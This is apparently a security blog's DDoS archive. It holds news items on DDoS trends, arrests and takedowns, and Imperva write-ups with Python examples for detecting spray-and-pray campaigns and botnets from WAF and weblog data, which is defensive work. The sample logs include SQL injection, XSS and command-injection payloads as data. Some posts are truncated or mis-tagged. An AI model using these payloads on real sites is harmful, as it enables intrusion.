Category Archives: DDoS

Hacker arrested for wave of fake bomb and shooting threats against schools

FBI agents have arrested a 20-year-old man alleged to have been part of a hacking gang which not only launched distributed denial-of-service (DDoS) attacks, but also launched a wave of chilling bomb and shooting threats against thousands of schools in the United States and United Kingdom.

Read more in my article on the Tripwire State of Security blog.

How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications

Attacks on applications can be divided into two types: targeted attacks and “spray and pray” attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization’s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or sold on the dark web. Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack.

One famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability (CVE-2018-7600) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. Tools exploiting this weakness became widely available, which caused the number of attacks on Drupal sites to explode.

The ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, and/or identify a sniffing attack that could be a precursor to a more serious targeted one.

Identifying Spray and Pray Attacks in Attack Analytics

Attack Analytics, launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigate-able incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.

We recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below.

Figure 1: Attack Analytics Dashboard

Clicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). An alternative way to get the list of spray and pray incidents potentially affecting the user is to log in to the console and use the “How common” filter.

Figure 2: Attack Analytics Many Customers Filter


A closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).

Figure 3: Attack Analytics Incident Insights

How Our Algorithm Works

The algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When there are similar incidents across a large number of customers in a close amount of time, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge, and is based on a combination of factors, such as:

  • The attack source: Network source (IP/Subnet), Geographic location
  • The attack target: URL, Host, Parameters
  • The attack time: Duration, Frequency
  • The attack type: Triggered rule
  • The attack tool: Tool name, type & parameters

In some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. When it is a distributed attack, the origin of the attack is not relevant, while other factors are relevant. In many cases, a spray and pray attack will be aimed at the same group of URLs.

Another significant common factor is the attack type, in particular, a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes, the same tools are observed, or the tools belong to the same type of attacks. The time element is also key, especially the duration of the attack or the frequency.
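The grouping described in this section, as an added illustration rather than Imperva's own implementation: a first pass keys on origin (collapsed to a /24) plus triggered rule to catch single-source campaigns, a second pass drops the origin and keys on target, rule and tool to catch distributed ones, and only groups that span several accounts within a time window are reported. The incident schema, the window, the thresholds and the addresses are all assumptions constructed for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_network


@dataclass(frozen=True)
class Incident:
    """One WAF incident as a single customer account saw it (constructed schema)."""
    account: str   # customer that was hit
    src_ip: str    # attack source
    url: str       # attack target
    rule: str      # WAF rule that fired (attack type)
    tool: str      # fingerprinted tool name, "" if unknown
    start: datetime


def subnet24(ip: str) -> str:
    """Collapse a source address to its /24 so a scanner hopping inside one
    block still counts as a single origin."""
    return str(ip_network(f"{ip}/24", strict=False))


def _cluster(incidents, key_fn, window):
    """Bucket incidents that share key_fn(inc) and start within `window` of
    the bucket's first incident (greedy, in time order)."""
    by_key = defaultdict(list)
    for inc in sorted(incidents, key=lambda i: i.start):
        by_key[key_fn(inc)].append(inc)
    buckets = []
    for key, incs in by_key.items():
        current = [incs[0]]
        for inc in incs[1:]:
            if inc.start - current[0].start <= window:
                current.append(inc)
            else:
                buckets.append((key, current))
                current = [inc]
        buckets.append((key, current))
    return buckets


def find_spray_and_pray(incidents, window=timedelta(days=3), min_accounts=3):
    """Return campaigns that hit at least `min_accounts` distinct accounts.

    Pass 1 keys on origin + rule: one source spraying many customers.
    Pass 2 ignores the origin and keys on target + rule + tool, which is what
    is left to correlate on when the campaign is spread over many addresses."""
    campaigns, explained = [], set()
    for key, incs in _cluster(incidents, lambda i: (subnet24(i.src_ip), i.rule), window):
        accounts = {i.account for i in incs}
        if len(accounts) >= min_accounts:
            campaigns.append({"kind": "single-source", "key": key,
                              "accounts": len(accounts), "incidents": len(incs)})
            explained.update(incs)
    remaining = [i for i in incidents if i not in explained]
    for key, incs in _cluster(remaining, lambda i: (i.url, i.rule, i.tool), window):
        accounts = {i.account for i in incs}
        if len(accounts) >= min_accounts:
            campaigns.append({"kind": "distributed", "key": key,
                              "accounts": len(accounts), "incidents": len(incs)})
    return campaigns


def _at(day, hour=9):
    return datetime(2019, 1, day, hour)


# Constructed sample incidents (documentation-range addresses, not real data).
INCIDENTS = [
    # one scanner IP sweeping four customers over three consecutive days
    Incident("acct-A", "203.0.113.7", "/wp-login.php", "wp-bruteforce", "scanner-x", _at(10)),
    Incident("acct-B", "203.0.113.7", "/wp-login.php", "wp-bruteforce", "scanner-x", _at(10, 14)),
    Incident("acct-C", "203.0.113.7", "/wp-login.php", "wp-bruteforce", "scanner-x", _at(11)),
    Incident("acct-D", "203.0.113.7", "/wp-login.php", "wp-bruteforce", "scanner-x", _at(12)),
    # same IP and rule weeks later: outside the window, so not joined to the above
    Incident("acct-H", "203.0.113.7", "/wp-login.php", "wp-bruteforce", "scanner-x", _at(30)),
    # the same Drupal payload from three unrelated /24s on the same day
    Incident("acct-E", "198.51.100.5", "/user/register", "drupal-rce", "", _at(15)),
    Incident("acct-F", "192.0.2.9", "/user/register", "drupal-rce", "", _at(15, 11)),
    Incident("acct-G", "198.18.0.4", "/user/register", "drupal-rce", "", _at(15, 20)),
    # a lone SQLi probe against one customer: noise, never reported
    Incident("acct-A", "192.0.2.77", "/search", "sqli", "", _at(16)),
]

if __name__ == "__main__":
    for campaign in find_spray_and_pray(INCIDENTS):
        print(campaign)
```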

Results and Findings

The Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties the incidents together. When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) is attacked.

Figure 4: Spray & Pray Incidents Spread

Here’s an interesting example: a spray and pray attack from a single IP that attacked 1,368 customers over the same 3 consecutive days with the same vulnerability scanner, LTX71. We’ve also seen Bad Bots illegally accessing resources, attacking from the same subnet located in Illinois using a Trustwave vulnerability scanner. These bots performed a URL scan on our customers’ resources, an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files on more than 50 different customers with cURL. And the list goes on.

Focusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers.

Figure 5: Single Source Spray & Pray Accounts Affected

More Actionable Insights Coming

Identifying spray and pray attacks is a great example of using the intelligence from Imperva’s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future.

The post How Imperva’s New Attack Crowdsourcing Secures Your Business’s Applications appeared first on Blog.

Average DDoS attack volumes grew by 194% in 12 months

The volume and complexity of DDoS attacks continued to grow in Europe during the final quarter of 2018, according to Link11. While Link11’s Security Operations Center (LSOC) registered 13,910 attacks in Q4 (12.7% down compared to Q3), the average attack volume grew by 8.7% to 5Gbps, and 59% of attacks used multiple attack vectors. Key findings of Link11’s Q4 DDoS report include: Average attack volumes grew by 194% in 12 months: In Q4 2018, average … More

The post Average DDoS attack volumes grew by 194% in 12 months appeared first on Help Net Security.

ThreatList: Latest DDoS Trends by the Numbers

Trends in DDoS attacks show an evolution beyond Mirai code and point to next-gen botnets that are better hidden and have a greater level of persistence on devices – making them "far more dangerous."

Historical OSINT – “I Know Who DDoS-ed Georgia and Last Summer”

Appreciate my rhetoric. In this post I'll provide actionable intelligence on a key DDoS for hire service that was primarily used in the Russia vs Georgia Cyber Attacks circa 2009 including the DDoS attack against Related actionable intelligence on the campaign: hxxp:// - Email: - - hxxp:// - hxxp:// The last one

Historical OSINT – A Peek Inside The Georgia Government’s Web Site Compromise Malware Serving Campaign – 2010

Remember the massive Russia vs Georgia cyber attack circa 2009? It seems that the time has come for me to dig a little bit deeper and provide actionable intelligence on one of the actors that seem to have participated in the campaign including a sample Pro-Georgian type of Cyber Militia that apparently attempted to "risk-forward" the responsibility for waging Cyberwar to third-parties including

A Shift From Quantity To Quality: 2018 Saw Cybercriminals Dropping Basic DDoS Operations.

The Kaspersky Lab DDoS Q4 Report covering statistics of the last quarter and the whole of 2018 highlights a 13% decline in the overall number of DDoS attacks when compared with the statistics from the previous year. However, the duration of mixed and HTTP flood attacks is growing, which suggests that malefactors are turning to more sophisticated DDoS attack techniques.

The low cost of DDoS-for-hire makes such attacks one of the most affordable cyberweapons for unscrupulous competitors or internet trolls. Businesses, regardless of their size or industry, can face this threat and suffer revenue and reputation losses if legitimate users and customers cannot access the company’s web resources. Despite the number of DDoS attacks falling in 2018, it’s too early to rejoice, as a decrease in the number of attacks does not mean a decrease in their severity. According to Kaspersky Lab researchers, as more and more organisations adopt solutions to protect themselves from simple types of DDoS attacks, 2019 will likely see attackers improve their expertise to overcome standard DDoS protection measures and bring the overall complexity of this type of threat to the next level.

Although the number of attacks is decreasing, analysis from Kaspersky Lab experts has found that the average attack duration is growing. Compared with the beginning of the year, the average length of attacks has more than doubled – from 95 minutes in Q1 to 218 minutes in Q4. It is notable that UDP flood attacks (in which the attacker sends a large number of UDP packets to the target’s server ports in order to overwhelm it and make it unresponsive for clients), which accounted for almost half (49%) of the DDoS attacks in 2018, were very short and rarely lasted more than 5 minutes.

Kaspersky Lab experts assume that the decline in the duration of UDP flood attacks illustrates that the market for easier-to-organise attacks is shrinking. Protection from DDoS attacks of this type is becoming widely implemented, making them ineffective in most cases. The researchers propose that attackers launch numerous UDP flood attacks to test whether a targeted resource is unprotected. If it immediately becomes clear that the attempts are not successful, the malefactors stop the attack.

At the same time, more complex attacks (such as HTTP misuse), which require time and money, will remain long. As the report revealed, the HTTP flood method and mixed attacks with an HTTP component, whose shares were relatively small (17% and 14%), accounted for about 80% of total DDoS attack time over the whole year.

“Most simple DDoS attacks don’t achieve their aim. Because of this, cybercriminals aiming to benefit financially from these attacks only have two options. The first option is that they could divert the resources required for DDoS attacks towards other sources of revenue, such as cryptomining. Their second option is to improve their technical skills. Given this, we can anticipate that DDoS attacks will evolve in 2019 and it will become harder for companies to detect them and stay protected,” – comments David Emm, Principal Security Researcher at Kaspersky Lab.

Regarding results from the last quarter, the longest DDoS attack in Q4 lasted 329 hours (almost 14 days) – such a long attack was last registered at the end of 2015.

The top three countries from which the most DDoS attacks were conducted remain the same. China is again in first place, but its share dropped significantly from 77.67% to 50.43%. The US remains second and third place is still occupied by Australia.

By target distribution, China still tops the list, but its share declined to 43.26% (70.58% in Q3).

In Q4, there have also been changes in the countries hosting the most C&C servers. As in the previous quarter, the US remained the leader, but the UK and the Netherlands came second and third, replacing Russia and Greece respectively. This is likely because of the number of active C&C Mirai servers increasing significantly in the aforementioned countries.

Kaspersky Lab recommends the following steps to protect an organisation from DDOS attacks:

· Train personnel to respond to such incidents in a proper way;

· Ensure that a company’s websites and web applications can handle high traffic;

· Use professional solutions to protect against attacks. For example, Kaspersky DDoS Protection combines Kaspersky Lab’s extensive expertise in combating cyberthreats and the company’s unique in-house developments. The solution protects against all types of DDoS attacks regardless of their complexity, strength or duration.

About Kaspersky Lab

Kaspersky Lab is a global cybersecurity company, which has been operating in the market for over 20 years. Kaspersky Lab’s deep threat intelligence and security expertise is constantly transforming into next generation security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky Lab technologies and we help 270,000 corporate clients protect what matters most to them. Learn more at

The post A Shift From Quantity To Quality: 2018 Saw Cybercriminals Dropping Basic DDoS Operations. appeared first on IT Security Guru.

Security Affairs: Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild

Security experts identified nearly 500,000 Ubiquity devices that may be affected by a vulnerability that has already been exploited in the wild.

Security experts are warning Ubiquity users of a vulnerability that has already been exploited in the wild.

Last week, the researcher Jim Troutman, consultant and director of the Northern New England Neutral Internet Exchange (NNENIX), revealed that threat actors had been targeting Ubiquity installs exposed online. Remote attackers were targeting the networking devices exposed via a discovery service accessible on UDP port 10001.

According to the expert, the devices are affected by a DoS flaw that attackers were attempting to trigger.

The vulnerability is not a novelty in the security and Ubiquity communities, in June the issue was discussed in a thread on the Ubiquity forums where users were warning of a possible exploit used in the wild.

Now security experts at Rapid7 revealed that they were monitoring suspicious traffic destined for port 10001 for at least one year.

Ubiquity is aware of the issue and is currently working on a firmware update that will address it, although at the same time it is trying to downplay it.

“There has been some discussion lately about a bug in airOS which can result in management access to airOS devices becoming inoperable until these devices are rebooted. This issue appears to be caused by external access to airOS devices using port 10001. As a temporary workaround for this issue while it is being investigated and resolved by the development team, network operators can block port 10001 at the network perimeter.” reads the advisory published by Ubiquity.

“To our current knowledge, this issue cannot be used to gain control of network devices or to create a DDoS attack.” 

Waiting for a fix, Ubiquity recommends blocking UDP port 10001, but this solution could have a disruptive effect on some services.

Scanning the Internet for vulnerable devices using the Rapid7’s Sonar project, experts found roughly 490,000 devices exposed online. Most of the vulnerable Ubiquity devices are located in Brazil, followed by the United States, and Spain.


“By decoding the responses, we are able to learn about the nature of these devices and clues as to how or why they are exposed publicly,” continues Rapid7. “For example, by grouping by the model names returned by these responses, we see big clusters around all sorts of Ubiquiti models/devices:”


The analysis of the device names revealed that in 17,000 cases they contain the string “HACKED-ROUTER-HELP-SOS,” a circumstance that suggests that these devices have already been hacked by exploiting other vulnerabilities.

Rapid7 reported its findings to US-CERT, CERT Brazil, and of course Ubiquiti.

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild appeared first on Security Affairs.


The Challenges of DIY Botnet Detection – and How to Overcome Them


Botnets have been around for over two decades, and with the rise of the Internet of Things (IoT) they have spread further to devices no one imagined they would – printers, webcams, and even toasters and fridges.

Some botnets enlist infected devices to mine cryptocurrency or steal passwords from other devices. But others are, in fact, legions of bot-soldiers waiting for a command to attack a target server. Here at Imperva, we detect botnets and prevent them from harming our customers. Botnet detection isn’t an easy task. In this post I’ll attempt to describe the pitfalls in botnet detection.

Detecting a Botnet

So what’s a botnet? Simply put, it’s a cluster of bots – compromised computers and devices – that perform commands given by the botnet owner. Usually, the botnet owner will dedicate one compromised device as the Command and Control (CnC) server for communication with his bots. Thus, the best way to discover a botnet is by finding its CnC, but that’s usually not a simple task. Let me explain why.

How can we Detect a Botnet

The smoking gun that points to a botnet is its CnC. Obviously, here at Imperva we don’t protect CnCs or bots – we protect against attacks originating from them. We are successful enough that it’s very unlikely any bot or CnC will be able to operate behind our service. Practically speaking, our best option to detect botnets is to examine their attacks on sites we protect.

When looking at exploit attempts, there are a few possible indicators of a botnet. For example, if the same IPs attack the same sites at the same time using the same payloads and attack pattern, there’s a good chance they’re part of the same botnet. This is especially true if many IPs and sites are involved. One common example is a DDoS attempt by a botnet on a web service.

A botnet attempting to DDoS a few sites: as the owner of the sites, during the attack you’ll see a large group of IPs sending many requests to the login page and the shopping cart page.

Reasons for False Positives

Even though I might have made detecting botnets sound quite simple, it really isn’t. Some payloads are so widely used that it’s difficult to distinguish between a truly-concerted botnet attack and a random one-off attack. Attackers can change their IPs by using a VPN or a proxy, making it look like many attackers are involved. Some proxy services even allow a single user to utilize many different IPs.

Hacking Tools can be Deceiving

Hacking tools and vulnerability scanners look similar to botnets as well. These tools generate the same payloads and attack patterns, and many hackers use them, regardless of the color of their hat. While it is an unlikely scenario, if different players conduct a penetration test on the same site at the same time, it’ll look like a coordinated botnet attack.

How can we Differentiate?

There are many ways to identify clients, but in this case simply looking at the raw request will do the trick. Luckily for us, because vulnerability scanners are so popular, it is easy to find out if they’re to blame. Sometimes, the user agent header will reveal the name of the tool. In other cases, Googling the payload will lead you straight to the tool.

Bot(net) Or Not?

Grab ‘em by the Payload

To discover botnets, we decided to use two different approaches. The first approach uses a naive back-and-forth algorithm to find botnets.

Any website owner can analyze data from their weblogs and use this technique.

You might want to improve this algorithm, and you can do so in several ways. You can separate the request to parameters and then search for a popular parameter value. Try using Levenshtein Distance, or any other distance algorithms, to find similar payloads. For this research, we decided to simply separate requests into query strings and post bodies.

The following charts plot the daily activity of IP addresses involved in an attack on our websites during a given timeframe. In red, you can see the percentage (left axis) of IPs that participated in an attack on any given day, which is calculated by taking the number of attacking IPs that day and dividing by the highest number of attacking IPs on ANY day during our time frame.

Similarly, the blue line represents the percentage (left axis) of attacked sites on any day, calculated by dividing the number of protected sites attacked that day by the highest number of protected sites attacked during this timeframe. The yellow bars represent the median (right axis) number of days all of the attacking IPs on that day have attacked overall during the studied timeframe. For instance, if 30 IPs attacked on one day and the median number shown is 10, that means 15 IPs have attacked more than 10 days, and 15 IPs have attacked fewer than 10 days.
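The payload-first approach described above and the three chart metrics just defined, as an added example that is not Imperva's code: requests are reduced to their query string or POST body, payloads seen from many IPs against many sites become candidate botnets, the "back" step lists what else those IPs sent, and the per-day series (percentage of peak attacking IPs, percentage of peak attacked sites, median attack-days of that day's IPs) is computed from the same records. The log format, thresholds and addresses are constructed assumptions, and the excerpt is assumed to contain only requests a WAF already flagged.

```python
import statistics
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed weblog excerpt (documentation-range addresses, not real traffic).
# Fields: day, client IP, site, method, path, POST body ("-" when absent).
LOG = """\
2019-01-10 198.51.100.11 shop.example GET /index.php?option=com_foo&cmd=ls -
2019-01-10 198.51.100.12 shop.example GET /index.php?option=com_foo&cmd=ls -
2019-01-10 198.51.100.13 blog.example GET /index.php?option=com_foo&cmd=ls -
2019-01-10 203.0.113.50 shop.example GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E -
2019-01-11 198.51.100.11 blog.example GET /index.php?option=com_foo&cmd=ls -
2019-01-11 198.51.100.12 wiki.example GET /index.php?option=com_foo&cmd=ls -
2019-01-11 198.51.100.13 wiki.example GET /index.php?option=com_foo&cmd=ls -
2019-01-11 198.51.100.11 shop.example POST /login.php user=a'+OR+1=1--&pass=x
2019-01-11 198.51.100.12 blog.example POST /login.php user=a'+OR+1=1--&pass=x
2019-01-12 198.51.100.11 shop.example GET /index.php?option=com_foo&cmd=ls -
2019-01-12 198.51.100.12 blog.example GET /index.php?option=com_foo&cmd=ls -
2019-01-12 198.51.100.14 shop.example GET /index.php?option=com_foo&cmd=ls -
"""


def parse_log(text):
    """Reduce each line to (day, ip, site, payload): the query string for GET
    and the body for POST, which is the split used in the research above."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        day, ip, site, method, path, body = line.split()
        payload = urlsplit(path).query if method == "GET" else body
        if payload and payload != "-":
            records.append({"day": day, "ip": ip, "site": site, "payload": payload})
    return records


def payload_clusters(records, min_ips=3, min_sites=2):
    """Candidate botnets: one exact payload from many IPs against many sites."""
    ips, sites = defaultdict(set), defaultdict(set)
    for r in records:
        ips[r["payload"]].add(r["ip"])
        sites[r["payload"]].add(r["site"])
    return [{"payload": p, "ips": ips[p], "sites": sites[p]}
            for p in ips if len(ips[p]) >= min_ips and len(sites[p]) >= min_sites]


def related_payloads(records, cluster, min_share=0.5):
    """The 'back' step: other payloads sent by at least min_share of the
    cluster's IPs, i.e. what else the same actors tried."""
    senders = defaultdict(set)
    for r in records:
        if r["ip"] in cluster["ips"] and r["payload"] != cluster["payload"]:
            senders[r["payload"]].add(r["ip"])
    return {p for p, s in senders.items() if len(s) / len(cluster["ips"]) >= min_share}


def daily_activity(records):
    """Per day: % of the peak attacking-IP count, % of the peak attacked-site
    count, and the median number of days that day's IPs attacked overall."""
    ips_by_day, sites_by_day, days_by_ip = defaultdict(set), defaultdict(set), defaultdict(set)
    for r in records:
        ips_by_day[r["day"]].add(r["ip"])
        sites_by_day[r["day"]].add(r["site"])
        days_by_ip[r["ip"]].add(r["day"])
    peak_ips = max(len(s) for s in ips_by_day.values())
    peak_sites = max(len(s) for s in sites_by_day.values())
    return {
        day: {
            "pct_ips": round(100 * len(ips_by_day[day]) / peak_ips, 1),
            "pct_sites": round(100 * len(sites_by_day[day]) / peak_sites, 1),
            # a high median means the same IPs keep coming back: low turnover
            "median_days": statistics.median(len(days_by_ip[ip]) for ip in ips_by_day[day]),
        }
        for day in sorted(ips_by_day)
    }


if __name__ == "__main__":
    recs = parse_log(LOG)
    for cluster in payload_clusters(recs):
        print(cluster["payload"], len(cluster["ips"]), "IPs,", len(cluster["sites"]), "sites")
        print("  also sent:", related_payloads(recs, cluster))
    for day, stats in daily_activity(recs).items():
        print(day, stats)
```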

Attack #1

A Backdoor Uploader. Nearly 1,000 IPs attempted to upload a backdoor to over 1,000 sites. The payload coming from the different IPs was exactly the same, but that’s not the best part. It appears that the payload is a variation of the infamous CKnife webshell. Combined with the low IP turnover rate (i.e. the same IPs are attacking half of the time, as shown by the high median yellow bars), chances are that this is a botnet.

Attack #2

Nearly 4,000 IPs used a payload meant to test for a SQL Injection vulnerability. A search for that payload revealed that the SQLI Dumper tool is behind the attack. Looking at other attacks performed by these IPs revealed attempts at Remote Code Execution (RCE), backdoor upload and other attacks that aren’t in the SQLI Dumper playbook. Also, while the number of attacking IPs grows – the median number of days attacked by the attacking IPs shrinks. Testing for correlation between them revealed a strong negative correlation (-0.84). Combining this data with the medium IP turnover rates (shown by the yellow bars) indicates that this attack is comprised of a few core bots and many temporary IPs. We tested this hypothesis and found that ~50 IPs were involved during the entire attack. This might mean that several different groups are using the same payload, and this is not a single botnet.

Attack #3

A tool that looks like a botnet, but isn’t. Let me explain why. Although nearly 2,000 IPs were involved, it’s easy to see that the median number of days they attacked is pretty low. This means that in most cases hackers used these IPs to attack for a few days, and then stopped using them completely. This pattern isn’t typical of botnets because botnet owners will usually reuse the IPs at their disposal. Googling the payload revealed that a popular hacking tool named AutoexploiterBot is behind this attack. Likely, multiple users used it to attack us, which explains why it wasn’t the same attacking IPs.

The payload sent during the attack:

The base64 in the exploit then decodes to a mid-stage code, which in turn decodes to a webshell with a visible link to the tool:

Bringing out the Big Guns

The second algorithm we used for botnet detection has a more sophisticated approach. We utilized our specialized Client Classification abilities to cluster clients that carried out many coordinated attacks.

Out of the hundreds of results we got, we focused on the most interesting ones:

Attack #4

Backdoor Uploader revisited. This is the same backdoor uploader we found using the first approach. This time we caught more of its core IPs as indicated by the low turnover rate (i.e. the high yellow median bars). It’s interesting we found this botnet using both approaches, even though they are inherently different.

Attack #5

Probably the most distinguishable of them all. This botnet has a handful of malicious Remote Code Execution (RCE) payloads. Each RCE embeds the same unique site address somewhere within the victim’s server. Furthermore, its IPs almost never change, as indicated by the very high yellow bars. To recap – we have the same few payloads, advertising the same site, coming from the same IPs. Thus strongly indicating this is a botnet.

Attack #6

A botnet blogpost isn’t complete without a Spambot. This one is aiming at the comment section of a web site, trying to add comments advertising a Chinese gambling site. What’s fascinating is that it allows us to glimpse multiple cycles of spam campaigns. In each cycle, a varying number of IPs attack for a short while and then stop. A possible explanation would be that this Spambot is for hire, and each cycle is a paid spam campaign.


Botnets can be a tricky thing to detect and mitigate, but even analyzing the simplest weblog entries can supply valuable insight, especially against continuous campaigns. All of the botnets we found can cause real damage to your site and customers. Some will take over your site and others will expose private information.

Once you find an IP that belongs to a botnet, you can block it and use it to discover more IPs that are part of the botnet. Some of the payloads we found in this research were a few years old, or new variants of old exploits. So digging into your log history might give you insight to protect your site the next time a botnet comes around.

The post The Challenges of DIY Botnet Detection – and How to Overcome Them appeared first on Blog.

Security Affairs: Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever

Imperva mitigated a SYN flood DDoS attack against one of its clients that exceeded 500 million packets per second, this is the largest ever.

Earlier this month, the cyber security software and services company Imperva mitigated an attack against one of its clients that exceeded 500 million packets per second. This attack was a SYN flood DDoS and it is the largest DDoS attack by packet volume ever observed.


The attacker sent both a flood of normal SYN packets and a large SYN flood using two previously known tools.

The attacker used a highly randomized and likely spoofed set of source ports and addresses to send packets of between 800 and 900 bytes.

Normal SYN packets serve to saturate the target’s resources, while the larger packets saturate the network.

According to the experts, the two tools used in the attack were developed by two different individuals, and the attacker combined them in the January attack.

“When we investigated, we realized the attack wasn’t generated using new tools, but two common older ones: one for the syn attack and the other for the large syn attack. Although both tools try to mimic legitimate operating systems, there are some odd, suspicion-raising differences.” reads the report published by Imperva.

“One possible hypothesis is that these tools, although used in the same attack, were written by two different individuals and then combined to form an arsenal and launch the most intensive DDoS attack against Network infrastructure in the history of the Internet. “

Experts pointed out that the most important factor in evaluating the magnitude of a DDoS attack is the packet rate, measured in packets per second (PPS).

The mitigation of DDoS attacks involving very high PPS is very hard because of the computer processing power required to evaluate every single packet.

Network appliances mostly evaluate the headers of every packet and only in a limited number of case they inspect the full payload. Their limiting factor is the packet rate, not the packet size.

Until now, the 2018 GitHub DDoS attack, which peaked at 1.35 Tbps, was considered the largest distributed denial-of-service attack ever. Its traffic was mainly composed of large packets sent from the same port from different servers at a relatively low PPS rate of around 129.6 million.

The attack observed by Imperva this month was nearly four times larger in terms of the number of packets, and the packets were sent from random sources.

The good news is that high PPS attacks are difficult to generate because they require more computational resources.

Pierluigi Paganini


The post Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever appeared first on Security Affairs.


Meet the New Imperva – Defending Your Business Growth Today and Tomorrow


Today’s Imperva is a champion in the fight to secure data and applications, wherever they reside. The threat landscape is dangerous and ever-changing, but our thousands of customers know they can count on Imperva to protect them. No wonder our solutions are recognized as leaders by analysts such as Gartner and Forrester Research.  

However, security is changing. It’s no longer just about protecting your company’s digital assets. It’s also about protecting your employees, partners, customers, and all of their applications, data, API’s, microservices, and even IoT devices. Millions of interactions occur every day that drive business value – and revenue.

Within this vast new universe, traditional lockdown security approaches just don’t cut it anymore. They’re too rigid, create their own security gaps, and stifle your business. What you need is a security posture that assumes an open exchange between data, applications and users. To do that successfully, you need greater visibility into all your digital systems, whether on-premises or in the cloud, so you can quickly pinpoint the threats that matter. You also need agility to adapt to fast-changing DevOps environments. And you need resilient systems that not only prevent data breaches and DDoS attacks but can also recover quickly, too.

In short, your business’s security needs are evolving. Which is why Imperva is also evolving, in order to remain the defender of your business growth, so you never have to choose between innovating for your customers and protecting what matters.

This year, we’ll be launching major expansions to our data and application security solutions. We’re also boosting the visibility delivered by them, distilling millions of data points so that you have actionable insights and the ability to automate the responses that protect your business.

To make it easier for you to focus on your business, we’re also simplifying how we bring our products to market, from the naming, to the packaging, to the pricing. Through a subscription model we call FlexProtect, enterprises can deploy Imperva solutions how and when they need them, in order to quickly gain the protection they need.

This year, Imperva will also be introducing useful new research and thought leadership to help your organization get smarter and respond to threats faster. Additionally, we are committed to making your experience with our brand and products even better. We are introducing an all-new look and feel, which you can check out today starting with our website, the new!

Doing business today has never been more potentially rewarding – or challenging. Security providers need to be up to the task. That’s why Imperva is evolving. We do more than simply guard your data and apps. We’ll help you anticipate real threats, minimize the business impact of any incidents, and build customer trust – all without overstretching limited resources. As your own business evolves, so does Imperva, so we can remain your defender and help you realize your growth ambitions, today and tomorrow.


Protect the pulse of your business.

The post Meet the New Imperva – Defending Your Business Growth Today and Tomorrow appeared first on Blog.

Law enforcement worldwide hunting users of DDoS-for-Hire services

Europol and law enforcement agencies worldwide are investigating DDoS-for-hire services and hunting users that paid them to carry out cyber attacks.

In April 2018, an international operation conducted by the European law enforcement agencies led by the UK’s National Crime Agency (NCA) and the Dutch Police, with the help of Europol, took down the world’s biggest DDoS-for-hire service.

The operation, dubbed Power Off, shut down the biggest DDoS-for-hire service, Webstresser, and led to the arrest of its administrators. According to the investigators, the platform was involved in over 4 million attacks.


The police arrested 6 members of the crime group behind the Webstresser website in Scotland, Croatia, Canada, and Serbia on Tuesday.

Europol confirmed that Webstresser had 136,000 registered users and was used to target online services of banks, government institutions, police forces and the gaming

Now law enforcement agencies are investigating the customers who paid for the DDoS-for-hire service.

Europol has announced that the British NCA is conducting several operations all over the world to identify and arrest users.

“In the United Kingdom a number of users have recently been visited by the police, who have seized over 60 personal electronic devices from them for analysis as part of Operation Power OFF.” reads the press release published by the Europol. “UK police are also conducting a number of live operations against other DDoS criminals; over 250 users of and other DDoS services will soon face action for the damage they have caused.”

Europol gained access to the accounts of over 151,000 registered Webstresser users when it dismantled the service, and the agency also obtained a huge trove of information about them.

According to Europol, over 250 users of DDoS-for-hire services, including Webstresser, will soon face potential prosecution.

“To this effect, the FBI seized last December 15 other DDoS-for-hire websites, including the relatively well known Downthem and Quantum Stresser. Similarly, the Romanian police has taken measures against the administrators of 2 smaller-scale DDoS platforms and has seized digital evidence, including information about the users.” continues the press release.

